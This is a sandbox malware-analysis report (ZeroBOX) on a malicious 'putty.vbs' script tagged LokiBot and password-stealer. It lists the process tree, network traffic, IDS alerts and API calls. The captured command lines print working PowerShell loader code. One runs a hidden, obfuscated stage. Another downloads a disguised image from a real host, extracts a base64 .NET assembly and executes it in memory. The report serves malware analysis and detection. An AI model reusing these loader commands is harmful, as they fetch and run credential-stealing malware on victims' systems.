Summary | ZeroBOX

Vbs-File0008765putty.vbs

LokiBot Generic Malware Antivirus Socket ScreenShot DNS PWS AntiDebug PowerShell AntiVM
Category Machine Started Completed
FILE s1_win7_x6403_us Nov. 2, 2023, 10:27 a.m. Nov. 2, 2023, 10:30 a.m.
Size 352.8KB
Type Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
MD5 359f4448782994c2b42aa0027ee021db
SHA256 58df85c3ffdb662fe6f84409f2a62124edc7157968e1da10f15464996b23ca99
CRC32 6B59D340
ssdeep 6144:17T97HiRWm7HS/7HSLnCWqkbuEQHSqsYnCmqkbzZ63C6xLD:ixX
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Vbs-File0008765putty.vbs

    1648
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '[encoded payload removed]';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('hpYIrIKGX','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"

      2136
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/ws8MAJ6eptiLfGu_1697738492.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LnNrbmlMeXR0dVAvZWxpZi8yMTIuMzExLjU3MS43MDEvLzpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"

        2272

Name Response Post-Analysis Lookup
imageupload.io 104.21.83.102
IP Address Status Action
107.175.113.212 Active Moloch
164.124.101.2 Active Moloch
172.67.222.26 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49166 -> 172.67.222.26:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1 192.168.56.103:49166 -> 172.67.222.26:443 C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 CN=imageupload.io b1:21:d8:81:60:0d:67:7c:14:72:94:30:ff:a0:2d:d7:b8:50:dd:46

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: True
console_handle: 0x00000013
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00577e20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00578520
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00577be0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00578220
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00578660
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00578720
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005787a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0064f238
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0064f7f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0064ef78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://107.175.113.212/file/PuttyLinks.txt
suspicious_features GET method with no useragent header suspicious_request GET https://imageupload.io/ib/ws8MAJ6eptiLfGu_1697738492.jpg
request GET http://107.175.113.212/file/PuttyLinks.txt
request GET https://imageupload.io/ib/ws8MAJ6eptiLfGu_1697738492.jpg
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 2228224
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02800000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2136
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0249a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2136
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02492000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029e1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024ca000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0252b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02527000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0249b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02525000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024cc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0252c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f11000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f12000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f13000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f14000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f15000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f16000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f17000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f18000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f19000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f1a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f1b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f1c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f1d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f1e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f1f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f21000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f22000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f23000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f24000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/ws8MAJ6eptiLfGu_1697738492.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LnNrbmlMeXR0dVAvZWxpZi8yMTIuMzExLjU3MS43MDEvLzpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('hpYIrIKGX','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
cmdline powershell -command "$Codigo = '...';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('hpYIrIKGX','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2140
thread_handle: 0x000002f8
process_identifier: 2136
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('hpYIrIKGX','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000300
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('hpYIrIKGX','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
filepath: powershell
1 1 0

CreateProcessInternalW

thread_identifier: 2276
thread_handle: 0x0000044c
process_identifier: 2272
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/ws8MAJ6eptiLfGu_1697738492.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LnNrbmlMeXR0dVAvZWxpZi8yMTIuMzExLjU3MS43MDEvLzpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x00000450
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received sæÇL49_™›þî_aràÕz#s皬¿„ë&ÒÉX«5ʏSðÂ¥!ã×ΛšhIƒÁ^‹q­ÒžÚt$lõ‰Ã:Ñ‘ûw… ¿‘µ‡Â͸¸òªe$-èb_ê—B–Ñð,#Kbçw‘Øæ¸ÝŒƒOjzz$Zò,$VÎד ŠÆ'›¦ãÿ ÷ÀÓ èZwã£û†{ÙÔjÃ=¦Ï¡ã‚‘Ðà}t¸C SÏý™V Ñ,Û_¹°7Åø@®D!5¶ç–Å|cþ>/ûw}ÝQyf•‰±7Íü»×ëß S1÷¾kÖ7‡dÈÙ¥dAýcæË­9ÿL¹úø6¾ì]ï$Òȓ/UÅ 5ž’Cý±0yQU Êè‹6õƒFb7µízEÁfÌ%Ðᯄ~P×>–224É ¶^X~‡©‰˜°ÏÁ+ÃZ›hú.(YŽsnlpœC™Äùç<ö6ˎmŠs{H~™o…$3Û øÑ¥ .³0 ޞyàð–õ*àÕT}œ L€× x8Ýæ[ó·€ÃQ. Ò¸èŽTâùÓ½û 0])¡8®¬ÄÔƒ@<…¬…&Бú۝ÓN'>¨ê¢¹4l8ª¡ Àw˜^{×ÙPkRmÈFÕ58CDi=ÄÅÎÊã>@1„qº¡ã®¼æç[sšËK*ï‹A+n~.¢ èyé1ÄùKjTjû}c§Tnç‹{­°=ætÝу{H@…ßA2í°S¤¥â`}ÅO3ÚË°Ü8î:«XŽ„º ³oößÒ@g$DáóžŽE¶šŒoZϐƒjËO/¾~¬tHºªÏJ3{ÂrÍ-c!¤—G°(,ôW›û‚OÏn §}”¡€7~Q’ïðy¯õàËÐÂ
Data received âôv¾œËD›eø쇜nUЖ]Ü|khƒºéyIôBZAƨ1#I »«Õ FÁ fH–PxrP™½nû³ý5p(¢Ãs,Ô§™¼$»LIz^=LjG7€óºOÌ4ì*1êwìH‰È^£^½—+GÛ°ÙD\¿Û*²(mX7xßW ¾L%¤Ú'x¯¾èAýAQœ%ç1ï³Cü€ i.fˆFuMÔO©'v³Ëø¼Nœ´ñöŠœ„Ǽ8ášÕ-Ð{2ޮĪ¥à¯d ý{bb,܀y©å8Äm5DÚ4î?7û¦ÞååÐ s“ãɾM̏®XyB¯…a˜xFþPÁ°’o»-q`Æ©‹v^!5ø9­…±vEKéROKÙZfÅyp ÑZñÇ A’J±ýàPù“³‰ H‰5‰®†_ñ“*û¡mÞ[O§í¶ è.ZÅ»›ogn=Üú-xílV“̧¨z R8ÉaNjyþ˜‚»õfjÛ,Q&ó``;ÐDdrþÝÑæ¼¹îø†6Õ8&ænˆùcb0ßW^藅/b9×îÄ÷­O"ÌuòÖïú¥Ò¦EÉ DƒTJÌÞàç-Ž ? ªTćùÇßQùQ’4špù XBƒQD˜vk ú ”wÊc‹ì¾ÜºSs¶S¼ÅÒïâ%c®ûÀ0ŒÚ1Yâ>SDK–áû%"GjKÞö«ÚŸ¶Å »¸ew$àñµãž¼¾äct_¬údZ…œ›ÓG»€TG ·äöë¼pd‹®?Hà¡^ÁŒ‰ñ<w~ànFG»£öÚ7 jšEp‹qPàlY{‰0zLÿ FÌ&Ïr,^z¬î»¥Ú×25g“oÇëbnô׺ЊŒÐöø®yҍF#¸
Data received ¬#‘WhY(¥1`FåÛø.._Yàª×FåÊg½qvY4¯5`Nõ,ցç²z D¶ã8?bV=Bö~Xòú…»Ó=Å°ëÓZ!¿¤£‚Æ&„ÂýWÍڑÕ?èmoX%&fþ‡ê5|š{f¸ýŒ|ўæCÞ¬Ð.M1Á—™™Ê7:4-|Q{K ) ©w 瘋™e`'7â~è€|(èR$ÂÌVX&ªG÷ˆÏû$xhažaÊ<Ÿ 4±\•¨ö5üé”#J±}Š­šÿsÂKì€í™\]éa# DظOqh` M„DfýÑ3D÷CåYь.³èåœh›·à¾ÆØڒ ‡¼Qè,'«ÖÙÏgµí9»‰Pٚo8zæØצ‡±‡Ânh³ ê-t½Ø±'ˆ×ǦUó(ŽÂn+ʁŒ+FéqM’ -;ûéIâ¼ó…ÅɂÒùя¯)3™iÌMrŒTCh¿­!&³( Ú÷3ŒÀÉLPüƒµGT³jw{·¨“CÍ«©ÇŸn©R“®ÈZf©`žD3±ŠWÌEý®v.©÷ÜöOÀw)U.žF‚ 9ØÁÛdûHP̲¾5úµHŠ†k5©ë‡zb&ÌL·ösaÈ40·o¤ÃYOOÙԊ!‚‹¬ª$ßxV­^"íê¼|^4a»“²®VsGK·ÓL‰­[™L»”ÂpBxN¾fa_Ãi‚3tY2ØÅû3ÇFM¨Ä¶Y™"[ÖÛćˆ¥àËúÞ8ø@º¥•‰ËƼû<¡´‘fw˜ ÖÀ²°îgÖ ‹¬_ª3,„3$ö†±÷Á¨ =ÆÕ¾$ö`/Ī°Ru™W\Åë@TháTð³qAK?Ë´Ïî3’mÂí‚…ù[¶©›¬ßoð®t5GkêÿMÍo2±¥M–ÍãˆI("ã+ó`כú祪aÚހa173á/‚ è˜RÍÊç÷Bîj¢ çƒþòF͏Ð19Z×ÉkÃÍIÑáÖ 67Cî.'7Wì6hóãú È;èÜ7èwP}ŕ|¥ÌA†*7.Ò§à®N–HçÅxŽõ…ÞÕÚ²ú¸Yý‹ÄŸê( ¹¯~K6"³0õ¦wìΟ ÌïþÄvX€ƒÑ@=æÚ €’8ç]œ|­N胆‹)|IÏʚßò¦Ý•Ãl' >ÀÜq vjِÏÓ°™ÜÝÎq/q 